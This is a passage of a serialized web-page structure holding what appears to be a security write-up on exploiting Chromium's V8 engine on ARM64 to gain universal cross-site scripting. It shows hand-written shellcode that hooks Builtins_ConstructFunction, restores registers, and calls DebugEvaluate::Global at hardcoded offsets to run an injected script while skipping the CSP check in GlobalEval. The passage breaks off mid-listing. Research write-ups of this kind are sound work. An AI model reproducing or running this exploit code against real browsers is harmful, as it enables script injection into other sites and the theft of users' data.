INSTR_SIZE}\n",{"type":26,"tag":137,"props":142913,"children":142914},{"class":5559,"line":5745},[142915],{"type":26,"tag":137,"props":142916,"children":142917},{},[142918],{"type":32,"value":142919},"{write_sc(orig_compile_instrs, \"lr\")}\n",{"type":26,"tag":137,"props":142921,"children":142922},{"class":5559,"line":5850},[142923],{"type":26,"tag":137,"props":142924,"children":142925},{"emptyLinePlaceholder":18},[142926],{"type":32,"value":6276},{"type":26,"tag":137,"props":142928,"children":142929},{"class":5559,"line":5878},[142930],{"type":26,"tag":137,"props":142931,"children":142932},{},[142933],{"type":32,"value":142462},{"type":26,"tag":137,"props":142935,"children":142936},{"class":5559,"line":5891},[142937],{"type":26,"tag":137,"props":142938,"children":142939},{},[142940],{"type":32,"value":142941},"mov x0, lr\n",{"type":26,"tag":137,"props":142943,"children":142944},{"class":5559,"line":5909},[142945],{"type":26,"tag":137,"props":142946,"children":142947},{},[142948],{"type":32,"value":142478},{"type":26,"tag":137,"props":142950,"children":142951},{"class":5559,"line":5930},[142952],{"type":26,"tag":137,"props":142953,"children":142954},{"emptyLinePlaceholder":18},[142955],{"type":32,"value":6276},{"type":26,"tag":137,"props":142957,"children":142958},{"class":5559,"line":5939},[142959],{"type":26,"tag":137,"props":142960,"children":142961},{},[142962],{"type":32,"value":142963},"// restore original registers\n",{"type":26,"tag":137,"props":142965,"children":142966},{"class":5559,"line":6191},[142967],{"type":26,"tag":137,"props":142968,"children":142969},{},[142970],{"type":32,"value":142971},"ldp x28, x29, [sp], #16\n",{"type":26,"tag":137,"props":142973,"children":142974},{"class":5559,"line":6208},[142975],{"type":26,"tag":137,"props":142976,"children":142977},{},[142978],{"type":32,"value":142979},"ldp x26, x27, [sp], #16\n",{"type":26,"tag":137,"props":142981,"children":142982},{"class":5559,"line":6225},[142983],{"type":26,"tag":137,"props":142984,"children":142985},{},[142986],{"type":32,"value":142987},"ldp x24, x25, [sp], #16\n",{"type":26,"tag":137,"props":142989,"children":142990},{"class":5559,"line":6238},[142991],{"type":26,"tag":137,"props":142992,"children":142993},{},[142994],{"type":32,"value":142995},"ldp x22, x23, [sp], #16\n",{"type":26,"tag":137,"props":142997,"children":142998},{"class":5559,"line":6247},[142999],{"type":26,"tag":137,"props":143000,"children":143001},{},[143002],{"type":32,"value":143003},"ldp x20, x21, [sp], #16\n",{"type":26,"tag":137,"props":143005,"children":143006},{"class":5559,"line":6270},[143007],{"type":26,"tag":137,"props":143008,"children":143009},{},[143010],{"type":32,"value":143011},"ldp x18, x19, [sp], #16\n",{"type":26,"tag":137,"props":143013,"children":143014},{"class":5559,"line":6279},[143015],{"type":26,"tag":137,"props":143016,"children":143017},{},[143018],{"type":32,"value":143019},"ldp x16, x17, [sp], #16\n",{"type":26,"tag":137,"props":143021,"children":143022},{"class":5559,"line":6288},[143023],{"type":26,"tag":137,"props":143024,"children":143025},{},[143026],{"type":32,"value":143027},"ldp x14, x15, [sp], #16\n",{"type":26,"tag":137,"props":143029,"children":143030},{"class":5559,"line":6355},[143031],{"type":26,"tag":137,"props":143032,"children":143033},{},[143034],{"type":32,"value":143035},"ldp x12, x13, [sp], #16\n",{"type":26,"tag":137,"props":143037,"children":143038},{"class":5559,"line":6363},[143039],{"type":26,"tag":137,"props":143040,"children":143041},{},[143042],{"type":32,"value":143043},"ldp x10, x11, [sp], #16\n",{"type":26,"tag":137,"props":143045,"children":143046},{"class":5559,"line":6393},[143047],{"type":26,"tag":137,"props":143048,"children":143049},{},[143050],{"type":32,"value":143051},"ldp x8,  x9,  [sp], #16\n",{"type":26,"tag":137,"props":143053,"children":143054},{"class":5559,"line":6401},[143055],{"type":26,"tag":137,"props":143056,"children":143057},{},[143058],{"type":32,"value":143059},"ldp x6,  x7,  [sp], #16\n",{"type":26,"tag":137,"props":143061,"children":143062},{"class":5559,"line":6433},[143063],{"type":26,"tag":137,"props":143064,"children":143065},{},[143066],{"type":32,"value":143067},"ldp x4,  x5,  [sp], #16\n",{"type":26,"tag":137,"props":143069,"children":143070},{"class":5559,"line":6441},[143071],{"type":26,"tag":137,"props":143072,"children":143073},{},[143074],{"type":32,"value":143075},"ldp x2,  x3,  [sp], #16\n",{"type":26,"tag":137,"props":143077,"children":143078},{"class":5559,"line":6501},[143079],{"type":26,"tag":137,"props":143080,"children":143081},{},[143082],{"type":32,"value":143083},"ldp x0,  x1,  [sp], #16\n",{"type":26,"tag":137,"props":143085,"children":143086},{"class":5559,"line":11634},[143087],{"type":26,"tag":137,"props":143088,"children":143089},{"emptyLinePlaceholder":18},[143090],{"type":32,"value":6276},{"type":26,"tag":137,"props":143092,"children":143093},{"class":5559,"line":11652},[143094],{"type":26,"tag":137,"props":143095,"children":143096},{},[143097],{"type":32,"value":143098},"// Builtins_ConstructFunction doesnt care about x4 and overwrites\n",{"type":26,"tag":137,"props":143100,"children":143101},{"class":5559,"line":11697},[143102],{"type":26,"tag":137,"props":143103,"children":143104},{},[143105],{"type":32,"value":143106},"// it immediately, so we can clobber and use it as a return register.\n",{"type":26,"tag":137,"props":143108,"children":143109},{"class":5559,"line":11803},[143110],{"type":26,"tag":137,"props":143111,"children":143112},{},[143113],{"type":32,"value":143114},"// This is done so lr isnt clobbered and ConstructFunction knows\n",{"type":26,"tag":137,"props":143116,"children":143117},{"class":5559,"line":26089},[143118],{"type":26,"tag":137,"props":143119,"children":143120},{},[143121],{"type":32,"value":143122},"// where to return\n",{"type":26,"tag":137,"props":143124,"children":143125},{"class":5559,"line":26124},[143126],{"type":26,"tag":137,"props":143127,"children":143128},{},[143129],{"type":32,"value":143130},"mov x4, lr\n",{"type":26,"tag":137,"props":143132,"children":143133},{"class":5559,"line":26132},[143134],{"type":26,"tag":137,"props":143135,"children":143136},{"emptyLinePlaceholder":18},[143137],{"type":32,"value":6276},{"type":26,"tag":137,"props":143139,"children":143140},{"class":5559,"line":26140},[143141],{"type":26,"tag":137,"props":143142,"children":143143},{},[143144],{"type":32,"value":143145},"// x15 and lr were saved in patched Builtins_ConstructFunction\n",{"type":26,"tag":137,"props":143147,"children":143148},{"class":5559,"line":26149},[143149],{"type":26,"tag":137,"props":143150,"children":143151},{},[143152],{"type":32,"value":143153},"ldp x15, lr, [sp], #16\n",{"type":26,"tag":137,"props":143155,"children":143156},{"class":5559,"line":26191},[143157],{"type":26,"tag":137,"props":143158,"children":143159},{"emptyLinePlaceholder":18},[143160],{"type":32,"value":6276},{"type":26,"tag":137,"props":143162,"children":143163},{"class":5559,"line":26224},[143164],{"type":26,"tag":137,"props":143165,"children":143166},{},[143167],{"type":32,"value":143168},"ret x4\n",{"type":26,"tag":35,"props":143170,"children":143171},{},[143172,143174,143179,143181,143186,143188,143194],{"type":32,"value":143173},"At this point, we have successfully hooked ",{"type":26,"tag":130,"props":143175,"children":143177},{"className":143176},[],[143178],{"type":32,"value":142056},{"type":32,"value":143180}," and can execute arbitrary shellcode whenever it is invoked from within the ",{"type":26,"tag":130,"props":143182,"children":143184},{"className":143183},[],[143185],{"type":32,"value":142572},{"type":32,"value":143187}," body. For our purposes, we want to evaluate an arbitrary JavaScript string to achieve UXSS, and the first function we examined for this was ",{"type":26,"tag":130,"props":143189,"children":143191},{"className":143190},[],[143192],{"type":32,"value":143193},"Builtins_GlobalEval",{"type":32,"value":470},{"type":26,"tag":35,"props":143196,"children":143197},{},[143198,143203,143205,143210,143212,143217],{"type":26,"tag":130,"props":143199,"children":143201},{"className":143200},[],[143202],{"type":32,"value":143193},{"type":32,"value":143204}," takes a single ",{"type":26,"tag":130,"props":143206,"children":143208},{"className":143207},[],[143209],{"type":32,"value":50528},{"type":32,"value":143211}," argument that it evaluates. However, it comes with some complications. One notable issue is that it checks whether the Content Security Policy (CSP) allows the use of ",{"type":26,"tag":130,"props":143213,"children":143215},{"className":143214},[],[143216],{"type":32,"value":40144},{"type":32,"value":7072},{"type":26,"tag":5512,"props":143219,"children":143221},{"code":143220,"language":31706,"meta":7,"className":31704,"style":7},"BUILTIN(GlobalEval) {\n  [...]\n\n  if (!Builtins::AllowDynamicFunction(isolate, target, target_global_proxy)) {\n    isolate->CountUsage(v8::Isolate::kFunctionConstructorReturnedUndefined);\n    return ReadOnlyRoots(isolate).undefined_value();\n  }\n",[143222],{"type":26,"tag":130,"props":143223,"children":143224},{"__ignoreMap":7},[143225,143238,143245,143252,143295,143317,143343],{"type":26,"tag":137,"props":143226,"children":143227},{"class":5559,"line":5560},[143228,143233],{"type":26,"tag":137,"props":143229,"children":143230},{"style":5682},[143231],{"type":32,"value":143232},"BUILTIN",{"type":26,"tag":137,"props":143234,"children":143235},{"style":5601},[143236],{"type":32,"value":143237},"(GlobalEval) {\n",{"type":26,"tag":137,"props":143239,"children":143240},{"class":5559,"line":5412},[143241],{"type":26,"tag":137,"props":143242,"children":143243},{"style":5601},[143244],{"type":32,"value":129704},{"type":26,"tag":137,"props":143246,"children":143247},{"class":5559,"line":5417},[143248],{"type":26,"tag":137,"props":143249,"children":143250},{"emptyLinePlaceholder":18},[143251],{"type":32,"value":6276},{"type":26,"tag":137,"props":143253,"children":143254},{"class":5559,"line":5642},[143255,143260,143265,143269,143274,143278,143282,143286,143291],{"type":26,"tag":137,"props":143256,"children":143257},{"style":5601},[143258],{"type":32,"value":143259},"  if (!Builtins::",{"type":26,"tag":137,"props":143261,"children":143262},{"style":6009},[143263],{"type":32,"value":143264},"AllowDynamicFunction",{"type":26,"tag":137,"props":143266,"children":143267},{"style":5601},[143268],{"type":32,"value":165},{"type":26,"tag":137,"props":143270,"children":143271},{"style":6009},[143272],{"type":32,"value":143273},"isolate",{"type":26,"tag":137,"props":143275,"children":143276},{"style":5601},[143277],{"type":32,"value":1108},{"type":26,"tag":137,"props":143279,"children":143280},{"style":6009},[143281],{"type":32,"value":117646},{"type":26,"tag":137,"props":143283,"children":143284},{"style":5601},[143285],{"type":32,"value":1108},{"type":26,"tag":137,"props":143287,"children":143288},{"style":6009},[143289],{"type":32,"value":143290},"target_global_proxy",{"type":26,"tag":137,"props":143292,"children":143293},{"style":5601},[143294],{"type":32,"value":37790},{"type":26,"tag":137,"props":143296,"children":143297},{"class":5559,"line":5745},[143298,143303,143307,143312],{"type":26,"tag":137,"props":143299,"children":143300},{"style":5584},[143301],{"type":32,"value":143302},"    isolate",{"type":26,"tag":137,"props":143304,"children":143305},{"style":5601},[143306],{"type":32,"value":16348},{"type":26,"tag":137,"props":143308,"children":143309},{"style":5682},[143310],{"type":32,"value":143311},"CountUsage",{"type":26,"tag":137,"props":143313,"children":143314},{"style":5601},[143315],{"type":32,"value":143316},"(v8::Isolate::kFunctionConstructorReturnedUndefined);\n",{"type":26,"tag":137,"props":143318,"children":143319},{"class":5559,"line":5850},[143320,143324,143329,143334,143339],{"type":26,"tag":137,"props":143321,"children":143322},{"style":5610},[143323],{"type":32,"value":19582},{"type":26,"tag":137,"props":143325,"children":143326},{"style":5682},[143327],{"type":32,"value":143328}," ReadOnlyRoots",{"type":26,"tag":137,"props":143330,"children":143331},{"style":5601},[143332],{"type":32,"value":143333},"(isolate).",{"type":26,"tag":137,"props":143335,"children":143336},{"style":5682},[143337],{"type":32,"value":143338},"undefined_value",{"type":26,"tag":137,"props":143340,"children":143341},{"style":5601},[143342],{"type":32,"value":6267},{"type":26,"tag":137,"props":143344,"children":143345},{"class":5559,"line":5878},[143346],{"type":26,"tag":137,"props":143347,"children":143348},{"style":5601},[143349],{"type":32,"value":8457},{"type":26,"tag":35,"props":143351,"children":143352},{},[143353,143355,143360],{"type":32,"value":143354},"This means we would need to patch the function further to ensure it never enters this ",{"type":26,"tag":130,"props":143356,"children":143358},{"className":143357},[],[143359],{"type":32,"value":18171},{"type":32,"value":143361}," block.",{"type":26,"tag":35,"props":143363,"children":143364},{},[143365],{"type":32,"value":143366},"Alternatively, we could replicate the calls made once the security checks pass:",{"type":26,"tag":5512,"props":143368,"children":143370},{"code":143369,"language":31706,"meta":7,"className":31704,"style":7},"BUILTIN(GlobalEval) {\n\n  [...]\n\n  DirectHandle\u003CJSFunction> function;\n  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(\n      isolate, function,\n      Compiler::GetFunctionFromValidatedString(\n          direct_handle(target->native_context(), isolate), source,\n          NO_PARSE_RESTRICTION, kNoSourcePosition));\n  RETURN_RESULT_OR_FAILURE(\n      isolate, Execution::Call(isolate, function, target_global_proxy, {}));\n",[143371],{"type":26,"tag":130,"props":143372,"children":143373},{"__ignoreMap":7},[143374,143385,143392,143399,143406,143414,143426,143434,143451,143481,143489,143501],{"type":26,"tag":137,"props":143375,"children":143376},{"class":5559,"line":5560},[143377,143381],{"type":26,"tag":137,"props":143378,"children":143379},{"style":5682},[143380],{"type":32,"value":143232},{"type":26,"tag":137,"props":143382,"children":143383},{"style":5601},[143384],{"type":32,"value":143237},{"type":26,"tag":137,"props":143386,"children":143387},{"class":5559,"line":5412},[143388],{"type":26,"tag":137,"props":143389,"children":143390},{"emptyLinePlaceholder":18},[143391],{"type":32,"value":6276},{"type":26,"tag":137,"props":143393,"children":143394},{"class":5559,"line":5417},[143395],{"type":26,"tag":137,"props":143396,"children":143397},{"style":5601},[143398],{"type":32,"value":129704},{"type":26,"tag":137,"props":143400,"children":143401},{"class":5559,"line":5642},[143402],{"type":26,"tag":137,"props":143403,"children":143404},{"emptyLinePlaceholder":18},[143405],{"type":32,"value":6276},{"type":26,"tag":137,"props":143407,"children":143408},{"class":5559,"line":5745},[143409],{"type":26,"tag":137,"props":143410,"children":143411},{"style":5601},[143412],{"type":32,"value":143413},"  DirectHandle\u003CJSFunction> function;\n",{"type":26,"tag":137,"props":143415,"children":143416},{"class":5559,"line":5850},[143417,143422],{"type":26,"tag":137,"props":143418,"children":143419},{"style":5682},[143420],{"type":32,"value":143421},"  ASSIGN_RETURN_FAILURE_ON_EXCEPTION",{"type":26,"tag":137,"props":143423,"children":143424},{"style":5601},[143425],{"type":32,"value":6054},{"type":26,"tag":137,"props":143427,"children":143428},{"class":5559,"line":5878},[143429],{"type":26,"tag":137,"props":143430,"children":143431},{"style":5601},[143432],{"type":32,"value":143433},"      isolate, function,\n",{"type":26,"tag":137,"props":143435,"children":143436},{"class":5559,"line":5891},[143437,143442,143447],{"type":26,"tag":137,"props":143438,"children":143439},{"style":5601},[143440],{"type":32,"value":143441},"      Compiler::",{"type":26,"tag":137,"props":143443,"children":143444},{"style":5682},[143445],{"type":32,"value":143446},"GetFunctionFromValidatedString",{"type":26,"tag":137,"props":143448,"children":143449},{"style":5601},[143450],{"type":32,"value":6054},{"type":26,"tag":137,"props":143452,"children":143453},{"class":5559,"line":5909},[143454,143459,143463,143467,143471,143476],{"type":26,"tag":137,"props":143455,"children":143456},{"style":5682},[143457],{"type":32,"value":143458},"          direct_handle",{"type":26,"tag":137,"props":143460,"children":143461},{"style":5601},[143462],{"type":32,"value":165},{"type":26,"tag":137,"props":143464,"children":143465},{"style":5584},[143466],{"type":32,"value":117646},{"type":26,"tag":137,"props":143468,"children":143469},{"style":5601},[143470],{"type":32,"value":16348},{"type":26,"tag":137,"props":143472,"children":143473},{"style":5682},[143474],{"type":32,"value":143475},"native_context",{"type":26,"tag":137,"props":143477,"children":143478},{"style":5601},[143479],{"type":32,"value":143480},"(), isolate), source,\n",{"type":26,"tag":137,"props":143482,"children":143483},{"class":5559,"line":5930},[143484],{"type":26,"tag":137,"props":143485,"children":143486},{"style":5601},[143487],{"type":32,"value":143488},"          NO_PARSE_RESTRICTION, kNoSourcePosition));\n",{"type":26,"tag":137,"props":143490,"children":143491},{"class":5559,"line":5939},[143492,143497],{"type":26,"tag":137,"props":143493,"children":143494},{"style":5682},[143495],{"type":32,"value":143496},"  RETURN_RESULT_OR_FAILURE",{"type":26,"tag":137,"props":143498,"children":143499},{"style":5601},[143500],{"type":32,"value":6054},{"type":26,"tag":137,"props":143502,"children":143503},{"class":5559,"line":6191},[143504,143509,143514],{"type":26,"tag":137,"props":143505,"children":143506},{"style":5601},[143507],{"type":32,"value":143508},"      isolate, Execution::",{"type":26,"tag":137,"props":143510,"children":143511},{"style":5682},[143512],{"type":32,"value":143513},"Call",{"type":26,"tag":137,"props":143515,"children":143516},{"style":5601},[143517],{"type":32,"value":143518},"(isolate, function, target_global_proxy, {}));\n",{"type":26,"tag":35,"props":143520,"children":143521},{},[143522,143524,143529,143531,143537,143539,143545,143547,143553],{"type":32,"value":143523},"But determining the correct ",{"type":26,"tag":130,"props":143525,"children":143527},{"className":143526},[],[143528],{"type":32,"value":117646},{"type":32,"value":143530}," value, obtaining ",{"type":26,"tag":130,"props":143532,"children":143534},{"className":143533},[],[143535],{"type":32,"value":143536},"target->native_context()",{"type":32,"value":143538},", and locating the ",{"type":26,"tag":130,"props":143540,"children":143542},{"className":143541},[],[143543],{"type":32,"value":143544},"direct_handle",{"type":32,"value":143546}," function, just to make a proper call to ",{"type":26,"tag":130,"props":143548,"children":143550},{"className":143549},[],[143551],{"type":32,"value":143552},"Compiler::GetFunctionFromValidatedString",{"type":32,"value":143554},", seemed unnecessarily cumbersome.",{"type":26,"tag":35,"props":143556,"children":143557},{},[143558,143560,143566],{"type":32,"value":143559},"Instead, we found a much simpler option with no security checks: ",{"type":26,"tag":130,"props":143561,"children":143563},{"className":143562},[],[143564],{"type":32,"value":143565},"DebugEvaluate::Global",{"type":32,"value":143567},". This function is used by the DevTools console to evaluate JavaScript entered there.",{"type":26,"tag":35,"props":143569,"children":143570},{},[143571],{"type":32,"value":143572},"For our needs, it is straightforward to call:",{"type":26,"tag":5512,"props":143574,"children":143576},{"code":143575,"language":31706,"meta":7,"className":31704,"style":7},"MaybeDirectHandle\u003CObject> DebugEvaluate::Global(Isolate* isolate,\n                                                Handle\u003CString> source,\n                                                debug::EvaluateGlobalMode mode,\n                                                REPLMode repl_mode);\n",[143577],{"type":26,"tag":130,"props":143578,"children":143579},{"__ignoreMap":7},[143580,143628,143656,143677],{"type":26,"tag":137,"props":143581,"children":143582},{"class":5559,"line":5560},[143583,143588,143592,143596,143601,143606,143610,143615,143619,143624],{"type":26,"tag":137,"props":143584,"children":143585},{"style":6009},[143586],{"type":32,"value":143587},"MaybeDirectHandle",{"type":26,"tag":137,"props":143589,"children":143590},{"style":5601},[143591],{"type":32,"value":8391},{"type":26,"tag":137,"props":143593,"children":143594},{"style":6009},[143595],{"type":32,"value":51453},{"type":26,"tag":137,"props":143597,"children":143598},{"style":5601},[143599],{"type":32,"value":143600},"> DebugEvaluate::",{"type":26,"tag":137,"props":143602,"children":143603},{"style":5682},[143604],{"type":32,"value":143605},"Global",{"type":26,"tag":137,"props":143607,"children":143608},{"style":5601},[143609],{"type":32,"value":165},{"type":26,"tag":137,"props":143611,"children":143612},{"style":6009},[143613],{"type":32,"value":143614},"Isolate",{"type":26,"tag":137,"props":143616,"children":143617},{"style":5573},[143618],{"type":32,"value":7152},{"type":26,"tag":137,"props":143620,"children":143621},{"style":5584},[143622],{"type":32,"value":143623}," isolate",{"type":26,"tag":137,"props":143625,"children":143626},{"style":5601},[143627],{"type":32,"value":6099},{"type":26,"tag":137,"props":143629,"children":143630},{"class":5559,"line":5412},[143631,143636,143640,143644,143648,143652],{"type":26,"tag":137,"props":143632,"children":143633},{"style":6009},[143634],{"type":32,"value":143635},"                                                Handle",{"type":26,"tag":137,"props":143637,"children":143638},{"style":5601},[143639],{"type":32,"value":8391},{"type":26,"tag":137,"props":143641,"children":143642},{"style":6009},[143643],{"type":32,"value":50528},{"type":26,"tag":137,"props":143645,"children":143646},{"style":5601},[143647],{"type":32,"value":8406},{"type":26,"tag":137,"props":143649,"children":143650},{"style":5584},[143651],{"type":32,"value":134457},{"type":26,"tag":137,"props":143653,"children":143654},{"style":5601},[143655],{"type":32,"value":6099},{"type":26,"tag":137,"props":143657,"children":143658},{"class":5559,"line":5417},[143659,143664,143669,143673],{"type":26,"tag":137,"props":143660,"children":143661},{"style":5601},[143662],{"type":32,"value":143663},"                                                debug::",{"type":26,"tag":137,"props":143665,"children":143666},{"style":6009},[143667],{"type":32,"value":143668},"EvaluateGlobalMode",{"type":26,"tag":137,"props":143670,"children":143671},{"style":5584},[143672],{"type":32,"value":108854},{"type":26,"tag":137,"props":143674,"children":143675},{"style":5601},[143676],{"type":32,"value":6099},{"type":26,"tag":137,"props":143678,"children":143679},{"class":5559,"line":5642},[143680,143685,143690],{"type":26,"tag":137,"props":143681,"children":143682},{"style":6009},[143683],{"type":32,"value":143684},"                                                REPLMode",{"type":26,"tag":137,"props":143686,"children":143687},{"style":5584},[143688],{"type":32,"value":143689}," repl_mode",{"type":26,"tag":137,"props":143691,"children":143692},{"style":5601},[143693],{"type":32,"value":6430},{"type":26,"tag":35,"props":143695,"children":143696},{},[143697,143699,143704,143706,143711,143713,143718,143720,143726,143727,143733],{"type":32,"value":143698},"We must supply the ",{"type":26,"tag":130,"props":143700,"children":143702},{"className":143701},[],[143703],{"type":32,"value":143273},{"type":32,"value":143705}," pointer, a ",{"type":26,"tag":130,"props":143707,"children":143709},{"className":143708},[],[143710],{"type":32,"value":50528},{"type":32,"value":143712}," object containing our XSS payload as ",{"type":26,"tag":130,"props":143714,"children":143716},{"className":143715},[],[143717],{"type":32,"value":134457},{"type":32,"value":143719},", and the ",{"type":26,"tag":130,"props":143721,"children":143723},{"className":143722},[],[143724],{"type":32,"value":143725},"mode",{"type":32,"value":3339},{"type":26,"tag":130,"props":143728,"children":143730},{"className":143729},[],[143731],{"type":32,"value":143732},"repl_mode",{"type":32,"value":143734}," values, which are simple enum literals.",{"type":26,"tag":35,"props":143736,"children":143737},{},[143738,143740,143745,143747,143753,143755,143760,143762,143767,143769,143775,143777,143783,143785,143790,143792,143797,143799,143804,143806,143811],{"type":32,"value":143739},"To obtain the ",{"type":26,"tag":130,"props":143741,"children":143743},{"className":143742},[],[143744],{"type":32,"value":143273},{"type":32,"value":143746}," pointer within our shellcode, we call ",{"type":26,"tag":130,"props":143748,"children":143750},{"className":143749},[],[143751],{"type":32,"value":143752},"Isolate::TryGetCurrent()",{"type":32,"value":143754},", which returns the current ",{"type":26,"tag":130,"props":143756,"children":143758},{"className":143757},[],[143759],{"type":32,"value":143273},{"type":32,"value":143761},". To construct a valid ",{"type":26,"tag":130,"props":143763,"children":143765},{"className":143764},[],[143766],{"type":32,"value":50528},{"type":32,"value":143768}," object holding our payload, we call ",{"type":26,"tag":130,"props":143770,"children":143772},{"className":143771},[],[143773],{"type":32,"value":143774},"v8::String::NewFromUTF8",{"type":32,"value":143776},". This ",{"type":26,"tag":130,"props":143778,"children":143780},{"className":143779},[],[143781],{"type":32,"value":143782},"NewFromUTF8",{"type":32,"value":143784}," function takes four arguments: the ",{"type":26,"tag":130,"props":143786,"children":143788},{"className":143787},[],[143789],{"type":32,"value":143273},{"type":32,"value":143791},", the string bytes as ",{"type":26,"tag":130,"props":143793,"children":143795},{"className":143794},[],[143796],{"type":32,"value":6303},{"type":32,"value":143798},", an enum literal specifying the string type, and ",{"type":26,"tag":130,"props":143800,"children":143802},{"className":143801},[],[143803],{"type":32,"value":11089},{"type":32,"value":143805},", which is the size of the ",{"type":26,"tag":130,"props":143807,"children":143809},{"className":143808},[],[143810],{"type":32,"value":6303},{"type":32,"value":19757},{"type":26,"tag":35,"props":143813,"children":143814},{},[143815],{"type":32,"value":143816},"The resulting shellcode that executes our XSS payload looks like this:",{"type":26,"tag":5512,"props":143818,"children":143820},{"code":143819,"language":142109,"meta":7,"className":142110,"style":7},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\nmovz x1, #0xf7a0\nmovk x1, #0x0071, lsl #16\nadd x9, x12, x1\nmovz x1, #0x5ac8\nmovk x1, #0x054f, lsl #16\nadd x0, x12, x1\nblr x9\n// *x0 is isolate pointer\n// store isolate ptr to stack\nldr x13, [x0]\nstr x13, [sp, #-16]!\n\n// store x10 = v8::String::NewFromUTF8\nmovz x1, #0x1140\nmovk x1, #0x0242, lsl #16\nsub x10, x12, x1\n\n// mmap a RW page for our xss payload\nmov x0, #0\nmov x1, #{page_align(len(XSS_PAYLOAD))}\nmov x2, #3\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\n// write our xss payload to mmapped rw page\n{write_str(XSS_PAYLOAD, \"x0\")}\n\n// store x11 = XSS_PAYLOAD string\nmov x11, x0\n\n// pop back isolate pointer\nldr x13, [sp], #16\n\n// at this point:\n// x13 = isolate *\n// x11 = XSS_PAYLOAD string mmapped region\n// x10 = v8::String::NewFromUtf8\n\n// call v8::String::NewFromUTF8 with our xss_payload\n// arg0 = isolate *\nmov x0, x13\n// arg1 = char *c_str\nmov x1, x11\n// arg2 = type = kNormal\nmov x2, #0\n// arg4 = length\nmov w3, #{len(XSS_PAYLOAD)}\n// call NewFromUTF8\nblr x10\n\n// store x14 = String XSS_PAYLOAD\nmov x14, x0\n\n// store x9 = v8::internal::DebugEvaluate::Global\nmovz x1, #0xe44c\nmovk x1, #0x014e, lsl #16\nsub x9, x12, x1\n\n// call v8::internal::DebugEvaluate::Global\n// arg0 = isolate *\nmov x0, x13\n// arg1 = String *source\nmov x1, x14\n// arg2 = mode = kDefault\nmov x2, #0\n// arg3 = repl_mode = kYes\nmov x3, #0\n\nblr x9\n",[143821],{"type":26,"tag":130,"props":143822,"children":143823},{"__ignoreMap":7},[143824,143832,143840,143848,143856,143864,143872,143880,143888,143896,143904,143912,143920,143927,143935,143943,143951,143959,143966,143974,143981,143989,143997,144004,144011,144018,144025,144032,144039,144047,144055,144062,144070,144078,144085,144093,144101,144108,144115,144123,144131,144139,144146,144154,144162,144170,144178,144186,144194,144202,144210,144218,144226,144234,144241,144249,144257,144264,144272,144280,144288,144296,144303,144311,144318,144325,144333,144341,144349,144357,144366,144375,144383],{"type":26,"tag":137,"props":143825,"children":143826},{"class":5559,"line":5560},[143827],{"type":26,"tag":137,"props":143828,"children":143829},{},[143830],{"type":32,"value":143831},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\n",{"type":26,"tag":137,"props":143833,"children":143834},{"class":5559,"line":5412},[143835],{"type":26,"tag":137,"props":143836,"children":143837},{},[143838],{"type":32,"value":143839},"movz x1, #0xf7a0\n",{"type":26,"tag":137,"props":143841,"children":143842},{"class":5559,"line":5417},[143843],{"type":26,"tag":137,"props":143844,"children":143845},{},[143846],{"type":32,"value":143847},"movk x1, #0x0071, lsl #16\n",{"type":26,"tag":137,"props":143849,"children":143850},{"class":5559,"line":5642},[143851],{"type":26,"tag":137,"props":143852,"children":143853},{},[143854],{"type":32,"value":143855},"add x9, x12, x1\n",{"type":26,"tag":137,"props":143857,"children":143858},{"class":5559,"line":5745},[143859],{"type":26,"tag":137,"props":143860,"children":143861},{},[143862],{"type":32,"value":143863},"movz x1, #0x5ac8\n",{"type":26,"tag":137,"props":143865,"children":143866},{"class":5559,"line":5850},[143867],{"type":26,"tag":137,"props":143868,"children":143869},{},[143870],{"type":32,"value":143871},"movk x1, #0x054f, lsl #16\n",{"type":26,"tag":137,"props":143873,"children":143874},{"class":5559,"line":5878},[143875],{"type":26,"tag":137,"props":143876,"children":143877},{},[143878],{"type":32,"value":143879},"add x0, x12, x1\n",{"type":26,"tag":137,"props":143881,"children":143882},{"class":5559,"line":5891},[143883],{"type":26,"tag":137,"props":143884,"children":143885},{},[143886],{"type":32,"value":143887},"blr x9\n",{"type":26,"tag":137,"props":143889,"children":143890},{"class":5559,"line":5909},[143891],{"type":26,"tag":137,"props":143892,"children":143893},{},[143894],{"type":32,"value":143895},"// *x0 is isolate pointer\n",{"type":26,"tag":137,"props":143897,"children":143898},{"class":5559,"line":5930},[143899],{"type":26,"tag":137,"props":143900,"children":143901},{},[143902],{"type":32,"value":143903},"// store isolate ptr to stack\n",{"type":26,"tag":137,"props":143905,"children":143906},{"class":5559,"line":5939},[143907],{"type":26,"tag":137,"props":143908,"children":143909},{},[143910],{"type":32,"value":143911},"ldr x13, [x0]\n",{"type":26,"tag":137,"props":143913,"children":143914},{"class":5559,"line":6191},[143915],{"type":26,"tag":137,"props":143916,"children":143917},{},[143918],{"type":32,"value":143919},"str x13, [sp, #-16]!\n",{"type":26,"tag":137,"props":143921,"children":143922},{"class":5559,"line":6208},[143923],{"type":26,"tag":137,"props":143924,"children":143925},{"emptyLinePlaceholder":18},[143926],{"type":32,"value":6276},{"type":26,"tag":137,"props":143928,"children":143929},{"class":5559,"line":6225},[143930],{"type":26,"tag":137,"props":143931,"children":143932},{},[143933],{"type":32,"value":143934},"// store x10 = v8::String::NewFromUTF8\n",{"type":26,"tag":137,"props":143936,"children":143937},{"class":5559,"line":6238},[143938],{"type":26,"tag":137,"props":143939,"children":143940},{},[143941],{"type":32,"value":143942},"movz x1, #0x1140\n",{"type":26,"tag":137,"props":143944,"children":143945},{"class":5559,"line":6247},[143946],{"type":26,"tag":137,"props":143947,"children":143948},{},[143949],{"type":32,"value":143950},"movk x1, #0x0242, lsl #16\n",{"type":26,"tag":137,"props":143952,"children":143953},{"class":5559,"line":6270},[143954],{"type":26,"tag":137,"props":143955,"children":143956},{},[143957],{"type":32,"value":143958},"sub x10, x12, x1\n",{"type":26,"tag":137,"props":143960,"children":143961},{"class":5559,"line":6279},[143962],{"type":26,"tag":137,"props":143963,"children":143964},{"emptyLinePlaceholder":18},[143965],{"type":32,"value":6276},{"type":26,"tag":137,"props":143967,"children":143968},{"class":5559,"line":6288},[143969],{"type":26,"tag":137,"props":143970,"children":143971},{},[143972],{"type":32,"value":143973},"// mmap a RW page for our xss 